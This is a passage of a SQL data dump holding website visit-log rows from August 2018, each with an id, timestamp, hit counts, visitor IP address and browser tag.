,1,0,0,'141.8.142.74','other'),(292941,1534983945,1,1,0,0,'66.249.66.57','chrome'),(292942,1534984590,2,0,2,0,'66.249.66.156',''),(292943,1534985546,1,1,0,0,'178.154.171.88','other'),(292944,1534985618,1,1,0,0,'141.8.142.74','other'),(292945,1534986629,1,0,1,0,'66.249.66.155',''),(292946,1534986935,1,0,1,0,'66.249.66.156',''),(292947,1534987389,1,0,1,0,'66.249.66.61',''),(292948,1534987859,1,1,0,0,'141.8.142.74','other'),(292949,1534988617,1,1,0,0,'46.229.168.66','other'),(292950,1534989478,1,1,0,0,'178.154.171.88','other'),(292951,1534989939,1,1,0,0,'141.8.142.74','other'),(292952,1534990731,1,0,1,0,'66.249.66.59',''),(292953,1534990786,1,1,0,0,'91.209.11.236','other'),(292954,1534991387,1,1,0,0,'216.244.66.241','other'),(292955,1534991855,1,1,0,0,'141.8.142.74','other'),(292956,1534992555,1,1,0,0,'8.29.198.27','other'),(292957,1534992825,1,1,0,0,'216.244.66.241','other'),(292958,1534993672,1,1,0,0,'141.8.142.74','other'),(292959,1534993676,1,1,0,0,'178.154.171.88','other'),(292960,1534994558,19,19,0,0,'148.251.120.201','other'),(292961,1534994648,1,1,0,0,'178.154.171.88','other'),(292962,1534996998,1,1,0,0,'5.9.98.178','other'),(292963,1534997262,1,1,0,0,'178.154.171.88','other'),(292964,1534997901,1,1,0,0,'5.9.98.178','other'),(292965,1534998220,1,1,0,0,'178.154.171.88','other'),(292966,1534998818,1,1,0,0,'5.9.98.178','other'),(292967,1534999131,1,1,0,0,'37.9.113.101','other'),(292968,1534999197,1,1,0,0,'178.154.171.88','other'),(292969,1534999345,2,2,0,0,'141.8.142.74','other'),(292970,1534999722,1,1,0,0,'5.9.98.178','other'),(292971,1534999946,1,1,0,0,'46.101.72.100','other'),(292972,1535000073,1,1,0,0,'89.162.132.82','chrome'),(292973,1535000128,1,1,0,0,'87.250.224.46','other'),(292974,1535000399,1,1,0,0,'95.163.255.171','other'),(292975,1535000564,2,2,0,0,'91.196.178.172','chrome'),(292976,1535000624,1,1,0,0,'5.9.98.178','other'),(292977,1535000811,1,1,0,0,'91.196.178.71','firefox'),(292978,1535000859,1,1,0,0,'141.8.142.74','other'),(292979,1535001165,1,1,0,0,'107.167.99.138','other'),(292980,1535001212,1,0,1,0,'66.249.66.57',''),(292981,1535001447,1,1,0,0,'91.196.178.186','chrome'),(292982,1535001525,1,1,0,0,'5.9.98.178','other'),(292983,1535001788,1,1,0,0,'178.154.171.88','other'),(292984,1535002074,1,1,0,0,'216.244.66.241','other'),(292985,1535002428,1,1,0,0,'5.9.98.178','other'),(292986,1535002748,1,1,0,0,'92.113.189.235','chrome'),(292987,1535003334,1,1,0,0,'5.9.98.178','other'),(292988,1535003399,1,1,0,0,'8.29.198.27','other'),(292989,1535003501,1,1,0,0,'54.36.149.96','other'),(292990,1535003605,2,2,0,0,'5.9.141.8','other'),(292991,1535003788,1,1,0,0,'107.167.102.133','other'),(292992,1535003864,1,1,0,0,'92.113.189.235','chrome'),(292993,1535003901,1,1,0,0,'216.244.66.241','other'),(292994,1535004100,1,1,0,0,'54.36.149.1','other'),(292995,1535004238,1,1,0,0,'5.9.98.178','other'),(292997,1535004374,1,1,0,0,'54.36.148.13','other'),(292998,1535004575,1,1,0,0,'54.36.148.111','other'),(292999,1535004855,1,1,0,0,'54.36.148.214','other'),(293000,1535004893,1,1,0,0,'54.36.149.48','other'),(293001,1535004981,1,1,0,0,'92.113.189.235','chrome'),(293002,1535005225,1,1,0,0,'66.102.9.136','chrome'),(293003,1535005273,1,1,0,0,'54.36.149.9','other'),(293004,1535005551,1,1,0,0,'54.36.148.143','other'),(293005,1535005752,2,2,0,0,'216.244.66.241','other'),(293006,1535005787,1,1,0,0,'54.36.148.33','other'),(293007,1535005815,1,1,0,0,'54.36.149.11','other'),(293008,1535005848,1,1,0,0,'54.36.148.173','other'),(293009,1535006105,1,1,0,0,'54.36.149.55','other'),(293010,1535006116,3,3,0,0,'91.196.179.138','chrome'),(293011,1535006521,1,1,0,0,'54.36.148.61','other'),(293012,1535007179,1,1,0,0,'54.36.149.50','other'),(293013,1535007352,1,1,0,0,'46.219.7.246','chrome'),(293014,1535007766,1,1,0,0,'195.225.231.223','chrome'),(293015,1535007836,1,1,0,0,'54.36.148.141','other'),(293016,1535008090,1,1,0,0,'54.36.148.174','other'),(293017,1535008120,1,1,0,0,'54.36.148.249','other'),(293018,1535008135,1,1,0,0,'54.36.149.4','other'),(293019,1535008179,1,1,0,0,'54.36.148.156','other'),(293020,1535008352,1,1,0,0,'141.8.142.74','other'),(293021,1535008402,1,1,0,0,'54.36.148.111','other'),(293022,1535008859,1,1,0,0,'54.36.149.64','other'),(293023,1535009230,1,1,0,0,'54.36.149.59','other'),(293024,1535009294,1,1,0,0,'141.8.142.74','other'),(293025,1535009455,2,2,0,0,'178.154.171.88','other'),(293026,1535009523,1,1,0,0,'54.36.149.21','other'),(293027,1535009543,1,1,0,0,'54.36.148.109','other'),(293028,1535009547,1,1,0,0,'178.93.196.115','chrome'),(293029,1535009687,1,1,0,0,'54.36.149.50','other'),(293030,1535009712,2,0,2,0,'66.249.66.59',''),(293031,1535010312,1,1,0,0,'207.46.13.180','other'),(293032,1535010319,1,1,0,0,'54.36.148.111','other'),(293033,1535010544,1,1,0,0,'54.36.148.242','other'),(293034,1535010627,1,1,0,0,'54.36.148.26','other'),(293035,1535011050,1,1,0,0,'54.36.149.93','other'),(293036,1535011090,1,1,0,0,'95.163.255.168','other'),(293037,1535011273,1,1,0,0,'54.36.149.42','other'),(293038,1535011683,1,1,0,0,'54.36.148.15','other'),(293039,1535011725,1,1,0,0,'54.36.148.81','other'),(293040,1535011999,1,1,0,0,'46.200.207.15','chrome'),(293041,1535012352,1,1,0,0,'54.36.148.26','other'),(293042,1535012467,1,1,0,0,'91.193.128.228','chrome'),(293043,1535012523,1,1,0,0,'54.36.148.192','other'),(293044,1535012541,1,1,0,0,'54.36.148.107','other'),(293045,1535012667,1,1,0,0,'92.113.189.235','chrome'),(293046,1535013237,1,1,0,0,'54.36.148.108','other'),(293047,1535013433,2,2,0,0,'141.8.142.74','other'),(293048,1535013438,1,1,0,0,'178.93.196.115','chrome'),(293049,1535013469,1,1,0,0,'54.36.148.169','other'),(293050,1535013681,1,1,0,0,'216.244.66.241','other'),(293051,1535013683,1,1,0,0,'54.36.149.13','other'),(293052,1535013725,1,1,0,0,'54.36.149.65','other'),(293053,1535014191,1,1,0,0,'54.36.148.172','other'),(293054,1535014304,1,1,0,0,'8.29.198.25','other'),(293055,1535014529,1,1,0,0,'54.36.149.81','other'),(293056,1535014892,1,1,0,0,'54.36.149.95','other'),(293057,1535015403,1,1,0,0,'54.36.148.223','other'),(293058,1535015960,1,1,0,0,'54.36.148.162','other'),(293059,1535016051,1,1,0,0,'54.36.149.4','other'),(293060,1535016386,1,1,0,0,'54.36.148.170','other'),(293061,1535016620,1,1,0,0,'54.36.148.20','other'),(293062,1535017232,1,1,0,0,'54.36.149.6','other'),(293063,1535017335,1,1,0,0,'54.36.149.88','other'),(293064,1535017481,1,1,0,0,'66.249.66.61','chrome'),(293065,1535017511,2,0,2,0,'66.249.66.157',''),(293066,1535017529,2,2,0,0,'91.196.177.46','chrome'),(293067,1535017944,1,1,0,0,'66.249.66.157','chrome'),(293068,1535017952,1,1,0,0,'54.36.149.68','other'),(293069,1535018281,1,1,0,0,'54.36.149.28','other'),(293070,1535018515,1,1,0,0,'178.92.164.144','firefox'),(293071,1535018595,1,1,0,0,'54.36.148.45','other'),(293072,1535018636,1,1,0,0,'54.36.149.100','other'),(293073,1535018781,1,1,0,0,'54.36.148.64','other'),(293074,1535018838,1,1,0,0,'54.36.149.8','other'),(293075,1535018872,1,1,0,0,'54.36.148.155','other'),(293076,1535018903,1,1,0,0,'95.132.46.13','firefox'),(293077,1535018905,1,1,0,0,'54.36.148.211','other'),(293078,1535018930,1,1,0,0,'54.36.148.168','other'),(293079,1535019263,2,2,0,0,'162.210.196.97','other'),(293080,1535019428,1,0,1,0,'66.249.66.61',''),(293081,1535019456,3,0,3,0,'66.249.66.57',''),(293082,1535019546,1,1,0,0,'92.113.189.235','chrome'),(293083,1535019721,1,1,0,0,'141.8.142.74','other'),(293084,1535019768,1,1,0,0,'91.196.178.82','firefox'),(293085,1535019997,1,1,0,0,'54.36.148.98','other'),(293086,1535020079,1,1,0,0,'54.36.148.156','other'),(293087,1535020391,4,4,0,0,'23.227.163.29','chrome'),(293088,1535020968,1,1,0,0,'178.154.171.88','other'),(293089,1535021316,1,1,0,0,'54.36.148.29','other'),(293090,1535021368,1,1,0,0,'54.36.149.46','other'),(293091,1535021408,1,1,0,0,'54.36.148.196','other'),(293092,1535021836,1,1,0,0,'54.36.148.156','other'),(293093,1535021970,1,1,0,0,'54.36.149.85','other'),(293094,1535021986,1,1,0,0,'54.36.148.237','other'),(293095,1535022068,1,1,0,0,'185.191.204.9','chrome'),(293096,1535022105,1,1,0,0,'51.255.65.46','other'),(293097,1535022430,1,1,0,0,'54.36.149.103','other'),(293098,1535023092,1,1,0,0,'54.36.148.57','other'),(293099,1535023488,2,2,0,0,'178.154.171.88','other'),(293100,1535023546,1,1,0,0,'54.36.148.83','other'),(293101,1535023756,1,1,0,0,'91.196.178.166','chrome'),(293102,1535024270,1,1,0,0,'54.36.149.83','other'),(293103,1535024321,1,1,0,0,'54.36.148.216','other'),(293104,1535025156,1,1,0,0,'8.29.198.27','other'),(293105,1535025173,1,1,0,0,'54.36.149.86','other'),(293106,1535025324,1,1,0,0,'54.36.148.120','other'),(293107,1535025648,1,1,0,0,'91.196.178.129','firefox'),(293108,1535025672,1,1,0,0,'54.36.149.77','other'),(293109,1535025852,1,1,0,0,'54.36.149.25','other'),(293110,1535025998,1,1,0,0,'141.8.142.74','other'),(293111,1535026001,1,1,0,0,'54.36.148.146','other'),(293112,1535026025,1,1,0,0,'54.36.148.211','other'),(293113,1535026068,1,1,0,0,'54.36.148.166','other'),(293114,1535026171,1,1,0,0,'37.9.113.182','other'),(293115,1535026250,1,1,0,0,'54.36.148.215','other'),(293116,1535026647,2,2,0,0,'216.244.66.241','other'),(293117,1535026838,1,1,0,0,'54.36.148.124','other'),(293118,1535027587,1,1,0,0,'178.154.171.88','other'),(293119,1535027591,1,1,0,0,'141.8.142.74','other'),(293120,1535027679,1,1,0,0,'207.46.13.180','other'),(293121,1535027936,1,1,0,0,'134.249.81.203','firefox'),(293122,1535028131,1,1,0,0,'54.36.148.29','other'),(293123,1535028257,1,1,0,0,'54.36.148.116','other'),(293124,1535028313,1,1,0,0,'180.235.149.203','firefox'),(293125,1535028321,1,1,0,0,'54.36.148.22','other'),(293126,1535028461,1,1,0,0,'54.36.148.43','other'),(293127,1535028875,1,1,0,0,'141.8.142.74','other'),(293128,1535028924,1,1,0,0,'178.154.171.88','other'),(293129,1535029323,1,1,0,0,'54.36.149.91','other'),(293130,1535029444,1,1,0,0,'54.36.149.71','other'),(293131,1535029661,1,1,0,0,'54.36.148.81','other'),(293132,1535029866,1,1,0,0,'54.36.148.74','other'),(293133,1535029876,1,1,0,0,'207.46.13.180','other'),(293134,1535029882,1,1,0,0,'91.196.178.167','chrome'),(293135,1535030178,1,1,0,0,'91.196.178.133','firefox'),(293136,1535030704,1,1,0,0,'178.154.171.88','other'),(293137,1535030750,1,1,0,0,'212.113.42.142','chrome'),(293138,1535030792,1,0,1,0,'66.249.66.61',''),(293139,1535030886,1,1,0,0,'54.36.148.51','other'),(293140,1535030934,1,1,0,0,'54.36.149.23','other'),(293141,1535030991,1,1,0,0,'216.244.66.241','other'),(293142,1535031219,1,1,0,0,'54.36.148.53','other'),(293143,1535031608,1,1,0,0,'54.36.148.21','other'),(293144,1535031644,1,1,0,0,'54.36.149.55','other'),(293145,1535032136,1,1,0,0,'54.36.148.33','other'),(293146,1535032170,1,1,0,0,'62.205.134.182','other'),(293147,1535032412,1,1,0,0,'54.36.148.94','other'),(293148,1535032456,1,1,0,0,'54.36.148.208','other'),(293149,1535032482,1,1,0,0,'54.36.148.234','other'),(293150,1535032616,1,1,0,0,'54.36.149.20','other'),(293151,1535032733,1,1,0,0,'95.163.255.98','other'),(293152,1535032738,1,1,0,0,'54.36.148.214','other'),(293153,1535032886,1,1,0,0,'54.36.148.227','other'),(293154,1535033105,1,1,0,0,'54.36.149.21','other'),(293155,1535033476,1,1,0,0,'54.36.149.54','other'),(293156,1535033670,1,1,0,0,'216.244.66.241','other'),(293157,1535033973,1,1,0,0,'54.36.148.215','other'),(293158,1535034010,1,1,0,0,'54.36.149.12','other'),(293159,1535034102,1,1,0,0,'54.36.148.229','other'),(293160,1535034411,1,1,0,0,'54.36.148.188','other'),(293161,1535034593,1,1,0,0,'35.162.70.167','chrome'),(293162,1535034930,1,1,0,0,'54.36.148.215','other'),(293163,1535035345,1,1,0,0,'54.36.149.44','other'),(293164,1535035981,1,1,0,0,'54.36.148.216','other'),(293165,1535036005,1,1,0,0,'8.29.198.27','other'),(293166,1535036862,1,1,0,0,'54.36.148.116','other'),(293167,1535037050,1,1,0,0,'54.36.148.50','other'),(293168,1535037064,1,1,0,0,'54.36.148.105','other'),(293169,1535037109,1,1,0,0,'54.36.148.103','other'),(293170,1535037711,1,1,0,0,'54.36.148.245','other'),(293171,1535037875,1,1,0,0,'178.154.171.88','other'),(293172,1535037971,1,1,0,0,'216.244.66.241','other'),(293173,1535038210,1,1,0,0,'54.36.148.173','other'),(293174,1535038330,1,1,0,0,'207.46.13.69','other'),(293175,1535038374,1,1,0,0,'54.36.149.40','other'),(293176,1535038435,1,1,0,0,'54.36.148.68','other'),(293177,1535038436,1,1,0,0,'54.36.148.231','other'),(293178,1535038526,1,1,0,0,'54.36.148.97','other'),(293179,1535038723,1,1,0,0,'54.36.149.90','other'),(293180,1535038900,1,1,0,0,'54.36.148.240','other'),(293181,1535039067,1,1,0,0,'54.36.148.246','other'),(293182,1535039431,1,1,0,0,'185.232.21.117','firefox'),(293183,1535039581,1,1,0,0,'54.36.148.178','other'),(293184,1535039618,1,1,0,0,'185.220.102.8','other'),(293185,1535039720,2,2,0,0,'141.8.142.74','other'),(293186,1535040011,1,1,0,0,'54.36.149.0','other'),(293187,1535040553,1,1,0,0,'54.36.148.21','other'),(293188,1535040554,1,1,0,0,'54.36.149.59','other'),(293189,1535040797,1,1,0,0,'54.36.149.73','other'),(293190,1535040936,1,1,0,0,'94.16.123.176','other'),(293191,1535041104,1,1,0,0,'54.36.148.178','other'),(293192,1535041332,1,1,0,0,'54.36.148.118','other'),(293193,1535041477,1,1,0,0,'54.36.148.244','other'),(293194,1535041478,1,1,0,0,'141.8.142.74','other'),(293195,1535041577,1,1,0,0,'212.113.42.142','chrome'),(293196,1535041687,1,1,0,0,'54.36.148.216','other'),(293197,1535042309,1,1,0,0,'54.36.149.86','other'),(293198,1535042331,2,2,0,0,'91.121.83.160','chrome'),(293199,1535042965,1,1,0,0,'54.36.148.168','other'),(293200,1535043130,1,1,0,0,'54.36.148.249','other'),(293201,1535043169,1,1,0,0,'54.36.149.12','other'),(293202,1535043248,1,1,0,0,'54.36.148.149','other'),(293203,1535043642,1,1,0,0,'54.36.149.72','other'),(293204,1535043681,1,1,0,0,'91.196.178.68','firefox'),(293205,1535043852,1,1,0,0,'46.211.4.62','chrome'),(293206,1535043878,1,1,0,0,'91.196.178.132','firefox'),(293207,1535044549,1,1,0,0,'185.220.101.33','other'),(293208,1535044774,1,1,0,0,'54.36.149.51','other'),(293209,1535044822,2,2,0,0,'54.36.149.5','other'),(293210,1535044944,1,1,0,0,'91.121.83.160','chrome'),(293211,1535044949,1,1,0,0,'54.36.148.45','other'),(293212,1535045052,1,1,0,0,'178.154.171.88','other'),(293213,1535045127,3,3,0,0,'37.52.18.204','chrome'),(293214,1535045250,1,1,0,0,'54.36.149.80','other'),(293215,1535045616,1,1,0,0,'54.36.148.152','other'),(293216,1535045666,1,1,0,0,'54.36.149.92','other'),(293217,1535045792,1,1,0,0,'141.8.142.74','other'),(293218,1535045925,1,1,0,0,'54.36.148.235','other'),(293219,1535045958,1,1,0,0,'178.154.171.88','other'),(293220,1535046610,1,1,0,0,'54.36.148.226','other'),(293221,1535046615,1,1,0,0,'54.36.149.98','other'),(293222,1535046694,1,1,0,0,'92.113.189.235','chrome'),(293223,1535046874,1,1,0,0,'8.29.198.25','other'),(293224,1535047138,1,1,0,0,'178.154.171.88','other'),(293225,1535047253,1,1,0,0,'141.8.142.74','other'),(293226,1535047545,2,2,0,0,'91.196.178.129','chrome'),(293227,1535047561,1,1,0,0,'54.36.149.41','other'),(293228,1535047995,1,1,0,0,'193.194.127.222','firefox'),(293229,1535048084,1,1,0,0,'54.36.148.221','other'),(293230,1535048132,1,1,0,0,'93.115.86.8','other'),(293231,1535048189,1,0,1,0,'66.249.66.59',''),(293232,1535048192,1,1,0,0,'95.163.255.96','other'),(293233,1535048248,1,1,0,0,'91.121.83.160','chrome'),(293234,1535048354,1,1,0,0,'54.36.148.105','other'),(293235,1535048379,1,1,0,0,'54.36.148.142','other'),(293236,1535048422,1,1,0,0,'54.36.149.107','other'),(293237,1535048573,1,1,0,0,'207.46.13.180','other'),(293238,1535048617,1,1,0,0,'54.36.148.161','other'),(293239,1535048674,1,1,0,0,'54.36.148.196','other'),(293240,1535048832,1,1,0,0,'54.36.148.186','other'),(293241,1535048850,1,1,0,0,'141.8.142.74','other'),(293242,1535048938,1,1,0,0,'54.36.148.177','other'),(293243,1535049011,1,1,0,0,'54.36.148.28','other'),(293244,1535049307,1,1,0,0,'54.36.149.35','other'),(293245,1535049515,1,1,0,0,'207.46.13.180','other'),(293246,1535049563,1,1,0,0,'216.244.66.241','other'),(293247,1535049628,1,1,0,0,'54.36.149.71','other'),(293248,1535049899,1,0,1,0,'66.249.66.59',''),(293249,1535049913,1,1,0,0,'66.249.66.157','chrome'),(293250,1535049947,1,1,0,0,'95.163.255.94','other'),(293251,1535049953,1,0,1,0,'66.249.66.155',''),(293252,1535050373,1,1,0,0,'54.36.149.4','other'),(293253,1535050517,1,1,0,0,'91.196.178.73','chrome'),(293254,1535050565,1,1,0,0,'54.36.148.120','other'),(293255,1535050790,1,1,0,0,'54.36.148.173','other'),(293256,1535050807,4,4,0,0,'95.216.20.84','other'),(293257,1535051403,1,1,0,0,'46.211.112.124','chrome'),(293258,1535051456,1,1,0,0,'54.36.148.20','other'),(293259,1535051511,1,1,0,0,'54.36.148.99','other'),(293260,1535051744,1,1,0,0,'54.36.148.202','other'),(293261,1535051749,1,1,0,0,'51.15.80.14','other'),(293262,1535051797,1,1,0,0,'54.36.148.228','other'),(293263,1535051816,1,1,0,0,'54.36.148.21','other'),(293264,1535051823,1,1,0,0,'91.196.178.87','chrome'),(293265,1535051952,1,1,0,0,'54.36.148.124','other'),(293266,1535052030,1,1,0,0,'54.36.148.234','other'),(293267,1535052120,1,1,0,0,'54.36.148.30','other'),(293268,1535052306,1,1,0,0,'54.36.148.185','other'),(293269,1535052649,1,1,0,0,'54.36.149.41','other'),(293270,1535052736,1,1,0,0,'54.36.148.115','other'),(293271,1535053353,1,1,0,0,'54.36.148.221','other'),(293272,1535053606,1,1,0,0,'54.36.148.226','other'),(293273,1535054378,1,0,1,0,'66.249.66.57',''),(293274,1535054429,4,4,0,0,'62.210.101.101','other'),(293275,1535054472,1,1,0,0,'54.36.149.28','other'),(293276,1535054758,1,1,0,0,'54.36.149.24','other'),(293277,1535054945,1,1,0,0,'141.8.142.74','other'),(293278,1535054968,1,1,0,0,'109.86.72.137','chrome'),(293279,1535055130,1,1,0,0,'207.46.13.180','other'),(293280,1535055348,1,1,0,0,'207.180.194.30','other'),(293281,1535055563,1,1,0,0,'178.154.171.88','other'),(293282,1535055585,1,1,0,0,'54.36.149.43','other'),(293283,1535055884,2,2,0,0,'141.8.142.74','other'),(293284,1535055946,1,1,0,0,'54.36.148.182','other'),(293285,1535056144,1,1,0,0,'54.36.148.146','other'),(293286,1535057289,1,1,0,0,'54.36.149.14','other'),(293287,1535057290,1,1,0,0,'54.36.149.104','other'),(293288,1535057448,1,1,0,0,'54.36.148.34','other'),(293289,1535057726,1,1,0,0,'8.29.198.25','other'),(293290,1535057786,1,1,0,0,'54.36.148.186','other'),(293291,1535057802,1,1,0,0,'216.244.66.241','other'),(293292,1535057854,1,1,0,0,'54.36.148.143','other'),(293293,1535058054,1,1,0,0,'54.36.148.235','other'),(293294,1535058073,1,1,0,0,'54.36.148.168','other'),(293295,1535058111,1,1,0,0,'54.36.149.78','other'),(293296,1535058205,1,1,0,0,'138.68.129.202','other'),(293297,1535058211,1,1,0,0,'54.36.148.176','other'),(293298,1535058504,1,1,0,0,'54.36.148.219','other'),(293299,1535058524,1,1,0,0,'54.36.148.150','other'),(293300,1535058580,1,1,0,0,'54.36.148.152','other'),(293301,1535058924,1,1,0,0,'185.220.102.8','other'),(293302,1535059092,1,1,0,0,'157.55.39.235','other'),(293303,1535059365,1,1,0,0,'54.36.148.184','other'),(293304,1535059505,2,2,0,0,'141.8.142.74','other'),(293305,1535059545,1,1,0,0,'77.121.238.117','other'),(293306,1535059646,1,1,0,0,'54.36.148.112','other'),(293307,1535059994,1,1,0,0,'54.36.148.25','other'),(293308,1535060774,1,1,0,0,'54.36.148.23','other'),(293309,1535060834,1,1,0,0,'54.36.148.101','other'),(293310,1535062507,1,1,0,0,'54.36.148.23','other'),(293311,1535062895,1,1,0,0,'54.36.149.1','other'),(293312,1535063048,1,1,0,0,'54.36.148.25','other'),(293313,1535063319,1,1,0,0,'54.36.148.36','other'),(293314,1535063455,1,1,0,0,'54.36.148.117','other'),(293315,1535063688,1,1,0,0,'54.36.148.141','other'),(293316,1535063775,1,1,0,0,'54.36.149.2','other'),(293317,1535063937,1,1,0,0,'54.36.149.75','other'),(293318,1535064084,1,1,0,0,'54.36.149.22','other'),(293319,1535064947,1,1,0,0,'54.36.149.67','other'),(293320,1535065031,1,1,0,0,'54.36.148.40','other'),(293321,1535065201,1,1,0,0,'54.36.148.238','other'),(293322,1535065463,1,1,0,0,'54.36.149.22','other'),(293323,1535065576,1,1,0,0,'54.36.149.34','other'),(293324,1535065601,1,1,0,0,'54.36.148.194','other'),(293325,1535065873,1,1,0,0,'54.36.148.214','other'),(293326,1535065947,1,1,0,0,'54.36.148.222','other'),(293327,1535066120,1,1,0,0,'89.31.57.5','other'),(293328,1535066174,2,2,0,0,'216.244.66.241','other'),(293329,1535066387,1,1,0,0,'54.36.148.233','other'),(293330,1535066446,1,1,0,0,'54.36.148.221','other'),(293331,1535066535,10,10,0,0,'94.130.9.183','other'),(293332,1535066752,1,0,1,0,'66.249.66.61',''),(293333,1535066976,1,1,0,0,'54.36.148.188','other'),(293334,1535067041,1,1,0,0,'54.36.148.97','other'),(293335,1535067139,1,1,0,0,'54.36.148.216','other'),(293336,1535067297,1,1,0,0,'54.36.148.87','other'),(293337,1535067323,1,1,0,0,'178.154.171.88','other'),(293338,1535067455,11,11,0,0,'94.130.9.183','other'),(293339,1535067498,1,1,0,0,'54.36.149.103','other'),(293340,1535067546,1,1,0,0,'54.36.148.58','other'),(293341,1535067582,1,1,0,0,'54.36.148.24','other'),(293342,1535067973,10,10,0,0,'40.77.167.80','other'),(293343,1535067982,8,8,0,0,'207.46.13.180','other'),(293344,1535067991,5,5,0,0,'157.55.39.235','other'),(293345,1535067995,10,10,0,0,'207.46.13.69','other'),(293346,1535068003,1,1,0,0,'8.14.146.83','chrome'),(293347,1535068150,1,1,0,0,'54.36.148.102','other'),(293348,1535068298,1,1,0,0,'54.36.148.120','other'),(293349,1535068369,3,3,0,0,'94.130.9.183','other'),(293350,1535068498,1,1,0,0,'54.165.59.7','other'),(293351,1535068576,1,1,0,0,'8.29.198.25','other'),(293352,1535068810,1,1,0,0,'54.36.148.71','other'),(293353,1535069668,1,0,1,0,'66.249.66.61',''),(293354,1535069712,1,1,0,0,'141.8.142.74','other'),(293355,1535069732,1,1,0,0,'178.17.170.196','other'),(293356,1535069804,1,1,0,0,'54.36.148.93','other'),(293357,1535069809,1,1,0,0,'54.36.148.123','other'),(293358,1535070041,1,1,0,0,'54.36.148.146','other'),(293359,1535070046,1,1,0,0,'54.36.148.57','other'),(293360,1535070125,1,1,0,0,'54.36.149.13','other'),(293361,1535070308,1,1,0,0,'54.36.148.79','other'),(293362,1535070314,1,1,0,0,'54.36.149.96','other'),(293363,1535070681,1,1,0,0,'54.36.149.61','other'),(293364,1535070925,1,1,0,0,'54.36.149.64','other'),(293365,1535071258,1,1,0,0,'54.36.149.93','other'),(293366,1535071295,1,0,1,0,'66.249.66.155',''),(293367,1535071327,1,1,0,0,'207.46.13.180','other'),(293368,1535071350,1,0,1,0,'66.249.66.57',''),(293369,1535071437,1,1,0,0,'54.36.148.72','other'),(293370,1535071519,1,1,0,0,'141.8.142.74','other'),(293371,1535071633,1,0,1,0,'66.249.66.61',''),(293372,1535072195,1,1,0,0,'54.36.149.101','other'),(293373,1535072325,1,1,0,0,'178.154.171.88','other'),(293374,1535072378,1,1,0,0,'54.36.148.132','other'),(293375,1535072387,1,1,0,0,'178.154.200.41','other'),(293376,1535072852,1,1,0,0,'54.165.59.7','other'),(293377,1535072999,1,1,0,0,'87.250.224.46','other'),(293378,1535073228,1,1,0,0,'54.36.149.10','other'),(293379,1535073304,2,2,0,0,'141.8.142.74','other'),(293380,1535073318,1,1,0,0,'51.15.82.2','other'),(293381,1535073461,1,0,1,0,'66.249.66.155',''),(293382,1535073466,1,1,0,0,'54.36.149.83','other'),(293383,1535073639,1,1,0,0,'216.244.66.241','other'),(293384,1535074566,1,1,0,0,'178.154.171.88','other'),(293385,1535074620,1,1,0,0,'54.36.149.102','other'),(293386,1535074717,1,1,0,0,'141.8.132.19','other'),(293387,1535074884,1,1,0,0,'54.36.149.22','other'),(293388,1535075381,1,1,0,0,'54.36.149.40','other'),(293389,1535075502,1,1,0,0,'54.36.148.244','other'),(293390,1535075798,1,1,0,0,'91.121.83.160','chrome'),(293391,1535076790,1,1,0,0,'207.46.13.69','other'),(293392,1535076882,1,1,0,0,'54.36.148.141','other'),(293393,1535076927,1,1,0,0,'178.154.171.88','other'),(293394,1535076935,1,1,0,0,'37.220.36.240','other'),(293395,1535077032,3,3,0,0,'91.121.83.160','chrome'),(293396,1535077144,1,1,0,0,'54.36.149.19','other'),(293397,1535077396,1,1,0,0,'54.36.149.31','other'),(293398,1535077764,2,2,0,0,'141.8.142.74','other'),(293399,1535078100,1,1,0,0,'54.36.148.14','other'),(293400,1535078238,1,1,0,0,'54.36.148.141','other'),(293401,1535078676,1,1,0,0,'54.36.148.40','other'),(293402,1535078977,1,1,0,0,'54.36.149.72','other'),(293403,1535079269,1,1,0,0,'54.36.149.49','other'),(293404,1535079424,1,1,0,0,'8.29.198.25','other'),(293405,1535079763,1,1,0,0,'54.36.148.251','other'),(293406,1535079951,1,1,0,0,'54.36.148.252','other'),(293407,1535080487,2,2,0,0,'141.8.142.74','other'),(293408,1535080534,1,1,0,0,'54.36.149.105','other'),(293409,1535080683,1,1,0,0,'54.36.149.73','other'),(293410,1535080968,1,1,0,0,'54.36.148.218','other'),(293411,1535081158,1,1,0,0,'54.36.148.90','other'),(293412,1535081657,1,1,0,0,'54.36.148.166','other'),(293413,1535081782,1,1,0,0,'54.36.149.65','other'),(293414,1535081784,1,1,0,0,'141.8.142.74','other'),(293415,1535081849,1,1,0,0,'54.36.148.131','other'),(293416,1535082038,1,1,0,0,'54.36.148.48','other'),(293417,1535082271,1,1,0,0,'54.36.148.230','other'),(293418,1535082389,1,1,0,0,'54.36.149.85','other'),(293419,1535082884,1,1,0,0,'54.36.148.38','other'),(293420,1535082896,1,1,0,0,'54.36.148.53','other'),(293421,1535083129,1,1,0,0,'178.154.171.88','other'),(293422,1535083194,1,1,0,0,'54.36.148.167','other'),(293423,1535083475,1,1,0,0,'54.36.148.22','other'),(293424,1535084138,1,1,0,0,'51.15.80.14','other'),(293425,1535084497,1,1,0,0,'54.36.148.29','other'),(293426,1535084549,1,1,0,0,'54.36.148.31','other'),(293427,1535084929,1,1,0,0,'54.36.148.176','other'),(293428,1535084958,1,1,0,0,'54.36.148.35','other'),(293429,1535084960,1,1,0,0,'178.154.171.88','other'),(293430,1535085201,2,2,0,0,'108.59.8.70','other'),(293431,1535085420,1,1,0,0,'54.36.148.80','other'),(293432,1535085727,1,1,0,0,'54.36.149.45','other'),(293433,1535085818,1,1,0,0,'54.36.149.43','other'),(293434,1535085836,1,1,0,0,'173.208.157.186','other'),(293435,1535085942,1,1,0,0,'91.121.83.160','chrome'),(293436,1535086122,1,1,0,0,'216.244.66.241','other'),(293437,1535086156,1,1,0,0,'54.36.148.24','other'),(293438,1535086239,1,1,0,0,'107.167.103.198','other'),(293439,1535086397,1,1,0,0,'54.36.148.14','other'),(293440,1535086416,1,1,0,0,'54.36.148.63','other'),(293441,1535086418,1,1,0,0,'54.36.149.35','other'),(293442,1535086447,1,1,0,0,'54.36.148.217','other'),(293443,1535086971,1,1,0,0,'54.36.148.139','other'),(293444,1535087008,1,1,0,0,'157.55.39.235','other'),(293445,1535087199,1,1,0,0,'207.46.13.69','other'),(293446,1535087269,1,1,0,0,'141.8.142.74','other'),(293447,1535087580,1,1,0,0,'37.9.113.182','other'),(293448,1535087640,1,1,0,0,'54.36.148.65','other'),(293449,1535087722,1,1,0,0,'51.15.65.25','other'),(293450,1535087788,1,1,0,0,'54.36.149.92','other'),(293451,1535088000,1,1,0,0,'54.36.148.126','other'),(293452,1535088085,1,1,0,0,'54.36.148.56','other'),(293453,1535088170,1,1,0,0,'54.36.149.93','other'),(293454,1535088273,1,1,0,0,'54.36.149.105','other'),(293455,1535088361,1,1,0,